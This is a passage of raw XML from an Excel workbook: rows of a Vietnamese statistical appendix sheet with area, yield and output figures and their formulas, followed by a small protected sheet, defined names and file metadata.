        <v>10</v>
      </c>
      <c r="AH150" s="33"/>
      <c r="AI150" s="32">
        <f t="shared" si="312"/>
        <v>4.3600000000000003</v>
      </c>
      <c r="AJ150" s="73">
        <f t="shared" ref="AJ150:AL150" si="313">AJ152+AJ155</f>
        <v>4.3600000000000003</v>
      </c>
      <c r="AK150" s="33"/>
      <c r="AL150" s="32">
        <f t="shared" si="313"/>
        <v>22.59</v>
      </c>
      <c r="AM150" s="73">
        <f t="shared" ref="AM150" si="314">AM152+AM155</f>
        <v>22.8</v>
      </c>
      <c r="AN150" s="73"/>
      <c r="AO150" s="73">
        <f t="shared" si="304"/>
        <v>100.16129032258065</v>
      </c>
      <c r="AP150" s="74">
        <f t="shared" si="305"/>
        <v>0.92999999999999972</v>
      </c>
      <c r="AQ150" s="75"/>
    </row>
    <row r="151" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A151" s="167" t="s">
        <v>3</v>
      </c>
      <c r="B151" s="163" t="s">
        <v>84</v>
      </c>
      <c r="C151" s="115" t="s">
        <v>36</v>
      </c>
      <c r="D151" s="134">
        <f>D154+D157</f>
        <v>179.11999999999998</v>
      </c>
      <c r="E151" s="71">
        <f>E154+E157</f>
        <v>175.15033</v>
      </c>
      <c r="F151" s="134">
        <f t="shared" ref="F151:L151" si="315">F154+F157</f>
        <v>6.75</v>
      </c>
      <c r="G151" s="134">
        <f t="shared" si="315"/>
        <v>57.160600000000017</v>
      </c>
      <c r="H151" s="134">
        <f t="shared" si="315"/>
        <v>13.290999999999999</v>
      </c>
      <c r="I151" s="134">
        <f t="shared" si="315"/>
        <v>17.487000000000002</v>
      </c>
      <c r="J151" s="134">
        <f t="shared" si="315"/>
        <v>44.5</v>
      </c>
      <c r="K151" s="134">
        <f t="shared" si="315"/>
        <v>21.07</v>
      </c>
      <c r="L151" s="134">
        <f t="shared" si="315"/>
        <v>19.053000000000001</v>
      </c>
      <c r="M151" s="165">
        <f>M154+M157</f>
        <v>130.91999999999999</v>
      </c>
      <c r="N151" s="206">
        <v>181</v>
      </c>
      <c r="O151" s="142">
        <f t="shared" ref="O151:P151" si="316">O154+O157</f>
        <v>149.11000000000001</v>
      </c>
      <c r="P151" s="32">
        <f t="shared" si="316"/>
        <v>6.75</v>
      </c>
      <c r="Q151" s="33">
        <v>6.75</v>
      </c>
      <c r="R151" s="142">
        <f t="shared" ref="R151:T151" si="317">R154+R157</f>
        <v>5.15</v>
      </c>
      <c r="S151" s="166"/>
      <c r="T151" s="32">
        <f t="shared" si="317"/>
        <v>57.430000000000007</v>
      </c>
      <c r="U151" s="33">
        <v>57.160600000000017</v>
      </c>
      <c r="V151" s="142">
        <f t="shared" ref="V151:X151" si="318">V154+V157</f>
        <v>47.82</v>
      </c>
      <c r="W151" s="166"/>
      <c r="X151" s="32">
        <f t="shared" si="318"/>
        <v>13.649999999999999</v>
      </c>
      <c r="Y151" s="33">
        <v>13.290999999999999</v>
      </c>
      <c r="Z151" s="142">
        <f t="shared" ref="Z151:AB151" si="319">Z154+Z157</f>
        <v>11.459999999999999</v>
      </c>
      <c r="AA151" s="166"/>
      <c r="AB151" s="32">
        <f t="shared" si="319"/>
        <v>18.516000000000002</v>
      </c>
      <c r="AC151" s="33"/>
      <c r="AD151" s="142">
        <f t="shared" ref="AD151:AF151" si="320">AD154+AD157</f>
        <v>15.66</v>
      </c>
      <c r="AE151" s="166"/>
      <c r="AF151" s="32">
        <f t="shared" si="320"/>
        <v>43.5</v>
      </c>
      <c r="AG151" s="142">
        <f t="shared" ref="AG151:AI151" si="321">AG154+AG157</f>
        <v>35.279999999999994</v>
      </c>
      <c r="AH151" s="166"/>
      <c r="AI151" s="32">
        <f t="shared" si="321"/>
        <v>10.93</v>
      </c>
      <c r="AJ151" s="142">
        <f t="shared" ref="AJ151:AL151" si="322">AJ154+AJ157</f>
        <v>16.579999999999998</v>
      </c>
      <c r="AK151" s="166"/>
      <c r="AL151" s="32">
        <f t="shared" si="322"/>
        <v>19.95093</v>
      </c>
      <c r="AM151" s="142">
        <f t="shared" ref="AM151" si="323">AM154+AM157</f>
        <v>17.16</v>
      </c>
      <c r="AN151" s="142"/>
      <c r="AO151" s="73">
        <f t="shared" si="304"/>
        <v>82.381215469613267</v>
      </c>
      <c r="AP151" s="74">
        <f t="shared" si="305"/>
        <v>18.190000000000026</v>
      </c>
      <c r="AQ151" s="143"/>
    </row>
    <row r="152" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A152" s="162">
        <v>1</v>
      </c>
      <c r="B152" s="163" t="s">
        <v>80</v>
      </c>
      <c r="C152" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D152" s="152">
        <v>34</v>
      </c>
      <c r="E152" s="83">
        <v>34.11</v>
      </c>
      <c r="F152" s="71">
        <v>1.5</v>
      </c>
      <c r="G152" s="71">
        <v>10.9</v>
      </c>
      <c r="H152" s="71">
        <v>2.59</v>
      </c>
      <c r="I152" s="71">
        <v>3.69</v>
      </c>
      <c r="J152" s="71">
        <v>9</v>
      </c>
      <c r="K152" s="71">
        <v>4.3</v>
      </c>
      <c r="L152" s="71">
        <v>2.79</v>
      </c>
      <c r="M152" s="109">
        <v>34.11</v>
      </c>
      <c r="N152" s="98">
        <v>35</v>
      </c>
      <c r="O152" s="73">
        <f>R152+V152+Z152+AD152+AG152+AJ152+AM152</f>
        <v>35.04</v>
      </c>
      <c r="P152" s="32">
        <v>1.5</v>
      </c>
      <c r="Q152" s="33">
        <v>1.5</v>
      </c>
      <c r="R152" s="73">
        <v>1.5</v>
      </c>
      <c r="S152" s="33"/>
      <c r="T152" s="32">
        <v>10.9</v>
      </c>
      <c r="U152" s="33">
        <v>10.9</v>
      </c>
      <c r="V152" s="73">
        <v>10.9</v>
      </c>
      <c r="W152" s="33"/>
      <c r="X152" s="32">
        <v>2.59</v>
      </c>
      <c r="Y152" s="33">
        <v>2.59</v>
      </c>
      <c r="Z152" s="73">
        <v>2.59</v>
      </c>
      <c r="AA152" s="33"/>
      <c r="AB152" s="32">
        <v>3.7</v>
      </c>
      <c r="AC152" s="33"/>
      <c r="AD152" s="73">
        <v>3.69</v>
      </c>
      <c r="AE152" s="33"/>
      <c r="AF152" s="32">
        <v>9</v>
      </c>
      <c r="AG152" s="73">
        <v>9</v>
      </c>
      <c r="AH152" s="33"/>
      <c r="AI152" s="32">
        <v>4.3600000000000003</v>
      </c>
      <c r="AJ152" s="73">
        <v>4.3600000000000003</v>
      </c>
      <c r="AK152" s="33"/>
      <c r="AL152" s="32">
        <v>2.79</v>
      </c>
      <c r="AM152" s="73">
        <v>3</v>
      </c>
      <c r="AN152" s="73"/>
      <c r="AO152" s="73">
        <f t="shared" si="304"/>
        <v>100.11428571428571</v>
      </c>
      <c r="AP152" s="74">
        <f t="shared" si="305"/>
        <v>0.92999999999999972</v>
      </c>
      <c r="AQ152" s="75"/>
    </row>
    <row r="153" spans="1:43" ht="22.5" customHeight="1">
      <c r="A153" s="167" t="s">
        <v>3</v>
      </c>
      <c r="B153" s="168" t="s">
        <v>11</v>
      </c>
      <c r="C153" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D153" s="152">
        <v>50.3</v>
      </c>
      <c r="E153" s="83">
        <f>E154/E152*10</f>
        <v>48.864828496042215</v>
      </c>
      <c r="F153" s="83">
        <v>45</v>
      </c>
      <c r="G153" s="83">
        <v>51.34</v>
      </c>
      <c r="H153" s="83">
        <v>49</v>
      </c>
      <c r="I153" s="83">
        <v>45</v>
      </c>
      <c r="J153" s="83">
        <v>49</v>
      </c>
      <c r="K153" s="83">
        <v>49</v>
      </c>
      <c r="L153" s="83">
        <v>47</v>
      </c>
      <c r="M153" s="169">
        <f>M154/M152*10</f>
        <v>36.001172676634418</v>
      </c>
      <c r="N153" s="207">
        <v>49</v>
      </c>
      <c r="O153" s="170">
        <f>O154/O152*10</f>
        <v>40.185502283105023</v>
      </c>
      <c r="P153" s="40">
        <v>45</v>
      </c>
      <c r="Q153" s="41">
        <v>45</v>
      </c>
      <c r="R153" s="86"/>
      <c r="S153" s="41"/>
      <c r="T153" s="40">
        <v>52</v>
      </c>
      <c r="U153" s="41">
        <v>51.34</v>
      </c>
      <c r="V153" s="86"/>
      <c r="W153" s="41"/>
      <c r="X153" s="40">
        <v>50</v>
      </c>
      <c r="Y153" s="41">
        <v>49</v>
      </c>
      <c r="Z153" s="86"/>
      <c r="AA153" s="41"/>
      <c r="AB153" s="40">
        <v>48</v>
      </c>
      <c r="AC153" s="41"/>
      <c r="AD153" s="86"/>
      <c r="AE153" s="41"/>
      <c r="AF153" s="40">
        <v>48</v>
      </c>
      <c r="AG153" s="86"/>
      <c r="AH153" s="41"/>
      <c r="AI153" s="40">
        <v>48</v>
      </c>
      <c r="AJ153" s="86"/>
      <c r="AK153" s="41"/>
      <c r="AL153" s="40">
        <v>46.67</v>
      </c>
      <c r="AM153" s="86"/>
      <c r="AN153" s="86"/>
      <c r="AO153" s="73">
        <f t="shared" si="304"/>
        <v>82.011229149193923</v>
      </c>
      <c r="AP153" s="74">
        <f t="shared" si="305"/>
        <v>4.1843296064706053</v>
      </c>
      <c r="AQ153" s="100"/>
    </row>
    <row r="154" spans="1:43" ht="22.5" customHeight="1">
      <c r="A154" s="167" t="s">
        <v>3</v>
      </c>
      <c r="B154" s="168" t="s">
        <v>12</v>
      </c>
      <c r="C154" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D154" s="152">
        <f>D153*D152/10</f>
        <v>171.01999999999998</v>
      </c>
      <c r="E154" s="83">
        <v>166.67793</v>
      </c>
      <c r="F154" s="83">
        <f t="shared" ref="F154:L154" si="324">F153*F152/10</f>
        <v>6.75</v>
      </c>
      <c r="G154" s="83">
        <f t="shared" si="324"/>
        <v>55.960600000000014</v>
      </c>
      <c r="H154" s="83">
        <f t="shared" si="324"/>
        <v>12.690999999999999</v>
      </c>
      <c r="I154" s="83">
        <f t="shared" si="324"/>
        <v>16.605</v>
      </c>
      <c r="J154" s="83">
        <f t="shared" si="324"/>
        <v>44.1</v>
      </c>
      <c r="K154" s="83">
        <f t="shared" si="324"/>
        <v>21.07</v>
      </c>
      <c r="L154" s="83">
        <f t="shared" si="324"/>
        <v>13.113</v>
      </c>
      <c r="M154" s="99">
        <v>122.8</v>
      </c>
      <c r="N154" s="193">
        <v>171</v>
      </c>
      <c r="O154" s="86">
        <f>R154+V154+Z154+AD154+AG154+AJ154+AM154</f>
        <v>140.81</v>
      </c>
      <c r="P154" s="40">
        <f t="shared" ref="P154:AL154" si="325">P153*P152/10</f>
        <v>6.75</v>
      </c>
      <c r="Q154" s="40">
        <v>6.75</v>
      </c>
      <c r="R154" s="40">
        <v>5.15</v>
      </c>
      <c r="S154" s="40"/>
      <c r="T154" s="40">
        <f t="shared" si="325"/>
        <v>56.680000000000007</v>
      </c>
      <c r="U154" s="40">
        <v>55.960600000000014</v>
      </c>
      <c r="V154" s="40">
        <v>47.12</v>
      </c>
      <c r="W154" s="40"/>
      <c r="X154" s="40">
        <f t="shared" si="325"/>
        <v>12.95</v>
      </c>
      <c r="Y154" s="40">
        <v>12.690999999999999</v>
      </c>
      <c r="Z154" s="40">
        <v>10.76</v>
      </c>
      <c r="AA154" s="40"/>
      <c r="AB154" s="40">
        <f t="shared" si="325"/>
        <v>17.760000000000002</v>
      </c>
      <c r="AC154" s="40"/>
      <c r="AD154" s="40">
        <v>14.96</v>
      </c>
      <c r="AE154" s="40"/>
      <c r="AF154" s="40">
        <f t="shared" si="325"/>
        <v>43.2</v>
      </c>
      <c r="AG154" s="40">
        <v>34.979999999999997</v>
      </c>
      <c r="AH154" s="40"/>
      <c r="AI154" s="40">
        <v>10.93</v>
      </c>
      <c r="AJ154" s="40">
        <v>16.579999999999998</v>
      </c>
      <c r="AK154" s="40"/>
      <c r="AL154" s="40">
        <f t="shared" si="325"/>
        <v>13.020930000000002</v>
      </c>
      <c r="AM154" s="40">
        <v>11.26</v>
      </c>
      <c r="AN154" s="41"/>
      <c r="AO154" s="73">
        <f t="shared" si="304"/>
        <v>82.345029239766092</v>
      </c>
      <c r="AP154" s="74">
        <f t="shared" si="305"/>
        <v>18.010000000000005</v>
      </c>
      <c r="AQ154" s="100"/>
    </row>
    <row r="155" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A155" s="162">
        <v>2</v>
      </c>
      <c r="B155" s="163" t="s">
        <v>81</v>
      </c>
      <c r="C155" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D155" s="134">
        <v>27</v>
      </c>
      <c r="E155" s="71">
        <v>27.060000000000002</v>
      </c>
      <c r="F155" s="71">
        <v>0</v>
      </c>
      <c r="G155" s="71">
        <v>3</v>
      </c>
      <c r="H155" s="71">
        <v>2</v>
      </c>
      <c r="I155" s="71">
        <v>1.26</v>
      </c>
      <c r="J155" s="71">
        <v>1</v>
      </c>
      <c r="K155" s="71">
        <v>0</v>
      </c>
      <c r="L155" s="71">
        <v>19.8</v>
      </c>
      <c r="M155" s="72">
        <v>27.06</v>
      </c>
      <c r="N155" s="98">
        <v>27</v>
      </c>
      <c r="O155" s="73">
        <f>R155+V155+Z155+AD155+AG155+AJ155+AM155</f>
        <v>27.060000000000002</v>
      </c>
      <c r="P155" s="32">
        <v>0</v>
      </c>
      <c r="Q155" s="33">
        <v>0</v>
      </c>
      <c r="R155" s="73">
        <v>0</v>
      </c>
      <c r="S155" s="33"/>
      <c r="T155" s="32">
        <v>3</v>
      </c>
      <c r="U155" s="33">
        <v>3</v>
      </c>
      <c r="V155" s="73">
        <v>3</v>
      </c>
      <c r="W155" s="33"/>
      <c r="X155" s="32">
        <v>2</v>
      </c>
      <c r="Y155" s="33">
        <v>2</v>
      </c>
      <c r="Z155" s="73">
        <v>2</v>
      </c>
      <c r="AA155" s="33"/>
      <c r="AB155" s="32">
        <v>1.26</v>
      </c>
      <c r="AC155" s="33"/>
      <c r="AD155" s="73">
        <v>1.26</v>
      </c>
      <c r="AE155" s="33"/>
      <c r="AF155" s="32">
        <v>1</v>
      </c>
      <c r="AG155" s="73">
        <v>1</v>
      </c>
      <c r="AH155" s="33"/>
      <c r="AI155" s="32">
        <v>0</v>
      </c>
      <c r="AJ155" s="73">
        <v>0</v>
      </c>
      <c r="AK155" s="33"/>
      <c r="AL155" s="32">
        <v>19.8</v>
      </c>
      <c r="AM155" s="73">
        <v>19.8</v>
      </c>
      <c r="AN155" s="73"/>
      <c r="AO155" s="73">
        <f t="shared" si="304"/>
        <v>100.22222222222223</v>
      </c>
      <c r="AP155" s="74">
        <f t="shared" si="305"/>
        <v>0</v>
      </c>
      <c r="AQ155" s="75"/>
    </row>
    <row r="156" spans="1:43" ht="22.5" customHeight="1">
      <c r="A156" s="167" t="s">
        <v>3</v>
      </c>
      <c r="B156" s="168" t="s">
        <v>11</v>
      </c>
      <c r="C156" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D156" s="171">
        <v>3</v>
      </c>
      <c r="E156" s="83">
        <f>E157/E155*10</f>
        <v>3.1309682187730967</v>
      </c>
      <c r="F156" s="83">
        <v>0</v>
      </c>
      <c r="G156" s="83">
        <v>4</v>
      </c>
      <c r="H156" s="83">
        <v>3</v>
      </c>
      <c r="I156" s="83">
        <v>7</v>
      </c>
      <c r="J156" s="83">
        <v>4</v>
      </c>
      <c r="K156" s="83">
        <v>3</v>
      </c>
      <c r="L156" s="83">
        <v>3</v>
      </c>
      <c r="M156" s="169">
        <f>M157/M155*10</f>
        <v>3.0007390983000737</v>
      </c>
      <c r="N156" s="192">
        <f>N157/N155*10</f>
        <v>3.494814814814815</v>
      </c>
      <c r="O156" s="172">
        <f>O157/O155*10</f>
        <v>3.0672579453067255</v>
      </c>
      <c r="P156" s="40">
        <v>0</v>
      </c>
      <c r="Q156" s="41">
        <v>0</v>
      </c>
      <c r="R156" s="86"/>
      <c r="S156" s="41"/>
      <c r="T156" s="40">
        <v>2.5</v>
      </c>
      <c r="U156" s="41">
        <v>4</v>
      </c>
      <c r="V156" s="86"/>
      <c r="W156" s="41"/>
      <c r="X156" s="40">
        <v>3.5</v>
      </c>
      <c r="Y156" s="41">
        <v>3</v>
      </c>
      <c r="Z156" s="86"/>
      <c r="AA156" s="41"/>
      <c r="AB156" s="40">
        <v>6</v>
      </c>
      <c r="AC156" s="41"/>
      <c r="AD156" s="86"/>
      <c r="AE156" s="41"/>
      <c r="AF156" s="40">
        <v>3</v>
      </c>
      <c r="AG156" s="86"/>
      <c r="AH156" s="41"/>
      <c r="AI156" s="40">
        <v>3</v>
      </c>
      <c r="AJ156" s="86">
        <v>0</v>
      </c>
      <c r="AK156" s="41"/>
      <c r="AL156" s="40">
        <v>3.5</v>
      </c>
      <c r="AM156" s="86"/>
      <c r="AN156" s="86"/>
      <c r="AO156" s="73">
        <f t="shared" si="304"/>
        <v>87.765964946250079</v>
      </c>
      <c r="AP156" s="74">
        <f t="shared" si="305"/>
        <v>6.6518847006651782E-2</v>
      </c>
      <c r="AQ156" s="100"/>
    </row>
    <row r="157" spans="1:43" ht="22.5" customHeight="1">
      <c r="A157" s="167" t="s">
        <v>3</v>
      </c>
      <c r="B157" s="168" t="s">
        <v>12</v>
      </c>
      <c r="C157" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D157" s="171">
        <f>D156*D155/10</f>
        <v>8.1</v>
      </c>
      <c r="E157" s="83">
        <v>8.4724000000000004</v>
      </c>
      <c r="F157" s="83">
        <f t="shared" ref="F157:L157" si="326">F156*F155/10</f>
        <v>0</v>
      </c>
      <c r="G157" s="83">
        <f t="shared" si="326"/>
        <v>1.2</v>
      </c>
      <c r="H157" s="83">
        <f t="shared" si="326"/>
        <v>0.6</v>
      </c>
      <c r="I157" s="83">
        <f t="shared" si="326"/>
        <v>0.88200000000000001</v>
      </c>
      <c r="J157" s="83">
        <f t="shared" si="326"/>
        <v>0.4</v>
      </c>
      <c r="K157" s="83">
        <f t="shared" si="326"/>
        <v>0</v>
      </c>
      <c r="L157" s="83">
        <f t="shared" si="326"/>
        <v>5.94</v>
      </c>
      <c r="M157" s="169">
        <v>8.1199999999999992</v>
      </c>
      <c r="N157" s="98">
        <f>P157+T157+X157+AB157+AF157+AI157+AL157</f>
        <v>9.4359999999999999</v>
      </c>
      <c r="O157" s="86">
        <f>R157+V157+Z157+AD157+AG157+AJ157+AM157</f>
        <v>8.3000000000000007</v>
      </c>
      <c r="P157" s="40">
        <f t="shared" ref="P157" si="327">P156*P155/10</f>
        <v>0</v>
      </c>
      <c r="Q157" s="41">
        <v>0</v>
      </c>
      <c r="R157" s="86">
        <f t="shared" ref="R157:T157" si="328">R156*R155/10</f>
        <v>0</v>
      </c>
      <c r="S157" s="41"/>
      <c r="T157" s="40">
        <f t="shared" si="328"/>
        <v>0.75</v>
      </c>
      <c r="U157" s="41">
        <v>1.2</v>
      </c>
      <c r="V157" s="86">
        <v>0.7</v>
      </c>
      <c r="W157" s="41"/>
      <c r="X157" s="40">
        <f t="shared" ref="X157" si="329">X156*X155/10</f>
        <v>0.7</v>
      </c>
      <c r="Y157" s="41">
        <v>0.6</v>
      </c>
      <c r="Z157" s="86">
        <v>0.7</v>
      </c>
      <c r="AA157" s="41"/>
      <c r="AB157" s="40">
        <f t="shared" ref="AB157" si="330">AB156*AB155/10</f>
        <v>0.75600000000000001</v>
      </c>
      <c r="AC157" s="41"/>
      <c r="AD157" s="86">
        <v>0.7</v>
      </c>
      <c r="AE157" s="41"/>
      <c r="AF157" s="40">
        <f t="shared" ref="AF157" si="331">AF156*AF155/10</f>
        <v>0.3</v>
      </c>
      <c r="AG157" s="86">
        <v>0.3</v>
      </c>
      <c r="AH157" s="41"/>
      <c r="AI157" s="40">
        <f t="shared" ref="AI157" si="332">AI156*AI155/10</f>
        <v>0</v>
      </c>
      <c r="AJ157" s="86">
        <v>0</v>
      </c>
      <c r="AK157" s="41"/>
      <c r="AL157" s="40">
        <f t="shared" ref="AL157" si="333">AL156*AL155/10</f>
        <v>6.93</v>
      </c>
      <c r="AM157" s="86">
        <v>5.9</v>
      </c>
      <c r="AN157" s="86"/>
      <c r="AO157" s="73">
        <f t="shared" si="304"/>
        <v>87.961000423908445</v>
      </c>
      <c r="AP157" s="74">
        <f t="shared" si="305"/>
        <v>0.18000000000000149</v>
      </c>
      <c r="AQ157" s="100"/>
    </row>
    <row r="158" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A158" s="173" t="s">
        <v>30</v>
      </c>
      <c r="B158" s="174" t="s">
        <v>128</v>
      </c>
      <c r="C158" s="175" t="s">
        <v>36</v>
      </c>
      <c r="D158" s="176">
        <v>12</v>
      </c>
      <c r="E158" s="177">
        <v>11</v>
      </c>
      <c r="F158" s="177">
        <v>1.5</v>
      </c>
      <c r="G158" s="177">
        <v>2</v>
      </c>
      <c r="H158" s="177">
        <v>1.5</v>
      </c>
      <c r="I158" s="177">
        <v>1.5</v>
      </c>
      <c r="J158" s="177">
        <v>1.5</v>
      </c>
      <c r="K158" s="177">
        <v>1.5</v>
      </c>
      <c r="L158" s="177">
        <v>1.5</v>
      </c>
      <c r="M158" s="178">
        <v>8</v>
      </c>
      <c r="N158" s="208">
        <f>P158+T158+X158+AB158+AF158+AI158+AL158</f>
        <v>12</v>
      </c>
      <c r="O158" s="179">
        <f>R158+V158+Z158+AD158+AG158+AJ158+AM158</f>
        <v>12.2</v>
      </c>
      <c r="P158" s="58">
        <v>1.5</v>
      </c>
      <c r="Q158" s="59">
        <v>1.5</v>
      </c>
      <c r="R158" s="179">
        <v>1.48</v>
      </c>
      <c r="S158" s="59"/>
      <c r="T158" s="58">
        <v>2</v>
      </c>
      <c r="U158" s="59">
        <v>2</v>
      </c>
      <c r="V158" s="179">
        <v>2</v>
      </c>
      <c r="W158" s="59"/>
      <c r="X158" s="58">
        <v>1.5</v>
      </c>
      <c r="Y158" s="59">
        <v>1.5</v>
      </c>
      <c r="Z158" s="179">
        <v>1.52</v>
      </c>
      <c r="AA158" s="59"/>
      <c r="AB158" s="58">
        <v>2</v>
      </c>
      <c r="AC158" s="59"/>
      <c r="AD158" s="179">
        <v>2</v>
      </c>
      <c r="AE158" s="59"/>
      <c r="AF158" s="58">
        <v>2</v>
      </c>
      <c r="AG158" s="179">
        <v>2</v>
      </c>
      <c r="AH158" s="59"/>
      <c r="AI158" s="58">
        <v>1.5</v>
      </c>
      <c r="AJ158" s="179">
        <v>1.6</v>
      </c>
      <c r="AK158" s="59"/>
      <c r="AL158" s="58">
        <v>1.5</v>
      </c>
      <c r="AM158" s="179">
        <v>1.6</v>
      </c>
      <c r="AN158" s="179"/>
      <c r="AO158" s="180">
        <f t="shared" si="304"/>
        <v>101.66666666666666</v>
      </c>
      <c r="AP158" s="181">
        <f t="shared" si="305"/>
        <v>4.1999999999999993</v>
      </c>
      <c r="AQ158" s="182"/>
    </row>
  </sheetData>
  <mergeCells count="16">
    <mergeCell ref="AQ4:AQ5"/>
    <mergeCell ref="AO4:AO5"/>
    <mergeCell ref="A1:AQ1"/>
    <mergeCell ref="A2:AQ2"/>
    <mergeCell ref="F4:L4"/>
    <mergeCell ref="O4:O5"/>
    <mergeCell ref="A3:O3"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
    <mergeCell ref="E4:E5"/>
    <mergeCell ref="M4:M5"/>
    <mergeCell ref="AP4:AP5"/>
    <mergeCell ref="R4:AM4"/>
    <mergeCell ref="N4:N5"/>
  </mergeCells>
  <pageMargins left="0.24" right="0.16" top="0.25" bottom="0.23" header="0.16" footer="0.17"/>
  <pageSetup scale="90" orientation="landscape" r:id="rId1"/>
  <headerFooter alignWithMargins="0"/>
  <ignoredErrors>
    <ignoredError sqref="O57 O62 O66 N99 AL98 O107 AD107 AG107 AJ107 O94 N87 O82:O83 O71 R13 N118 N25 P25 T25 Z37 AD37 O37 AL17:AM17 N17 O18 O40 O156 N106 O111 O153 N156 N40 N71 N82 N94 N57 O33 P98 R107 R98 T17 T107 T98 V17 V107 V98 X17 X107 X98 Z17 Z107 Z98 AB17 AB107 AB98 AD17 AD98 AF17:AG17 AF98:AG98 AI17:AJ17 AI98:AJ98 O97:O98" formula="1"/>
  </ignoredError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C26"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="29.85546875" style="2" customWidth="1"/>
    <col min="2" max="2" width="1.140625" style="2" customWidth="1"/>
    <col min="3" max="3" width="32.28515625" style="2" customWidth="1"/>
    <col min="4" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="13.5">
      <c r="A1" s="1" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="14.25" thickBot="1">
      <c r="A2" s="1" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="3" t="s">
        <v>58</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4" s="3">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="13.5" thickBot="1"/>
    <row r="7" spans="1:3">
      <c r="A7" s="5" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" s="6" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="9" spans="1:3">
      <c r="A9" s="7" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="10" spans="1:3">
      <c r="A10" s="6" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="8" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="13" spans="1:3" ht="13.5" thickBot="1"/>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="4" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="16" spans="1:3" ht="13.5" thickBot="1"/>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="C17" s="4" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="A20" s="9" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="C26" s="10" t="s">
        <v>56</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" objects="1"/>
  <phoneticPr fontId="19" type="noConversion"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>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Phụ biểu</vt:lpstr>
      <vt:lpstr>zAVlCQg4</vt:lpstr>
      <vt:lpstr>_Builtin0</vt:lpstr>
      <vt:lpstr>Bust</vt:lpstr>
      <vt:lpstr>Continue</vt:lpstr>
      <vt:lpstr>Documents_array</vt:lpstr>
      <vt:lpstr>Hello</vt:lpstr>
      <vt:lpstr>'Phụ biểu'!Print_Titles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cp:lastModifiedBy>
  <cp:lastPrinted>2024-11-22T07:21:58Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1996-10-14T23:33:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-22T07:49:23Z</dcterms:modified>
</cp:coreProperties>
</file>